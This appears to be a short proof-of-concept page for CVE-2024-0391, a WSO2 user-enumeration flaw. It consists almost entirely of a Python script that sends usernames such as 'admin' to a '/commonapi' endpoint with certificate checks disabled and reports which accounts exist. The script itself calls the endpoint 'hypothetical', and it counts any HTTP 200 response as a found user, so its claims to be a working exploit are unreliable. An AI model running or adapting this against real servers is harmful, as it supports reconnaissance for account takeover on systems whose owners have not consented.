CVE-2024-0391 WSO2用户枚举漏洞

import requests def check_user_existence(target_url, username): # Hypothetical endpoint based on the vulnerability description endpoint = f"{target_url}/commonapi" # Payload typically includes the username for the OTP flow payload = { "username": username, "action": "checkAccountLock" } headers = { "Content-Type": "application/json" } try: # Sending POST request to the vulnerable endpoint response = requests.post(endpoint, json=payload, headers=headers, verify=False) # Analyze the response to infer user existence # Logic: If response indicates 'locked' or specific user state, user exists. # If response is 'user not found' or generic error, user does not exist. if "Account is locked" in response.text or response.status_code == 200: print(f"[+] User Found: {username}") return True elif "User not found" in response.text or "Invalid user" in response.text: print(f"[-] User Not Found: {username}") return False else: # Fallback for different response patterns print(f"[?] Uncertain response for {username}: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"Error connecting to target: {e}") return False # Example usage target = "https://target-wso2-server.com" user_list = ["admin", "administrator", "test", "user1"] for user in user_list: check_user_existence(target, user)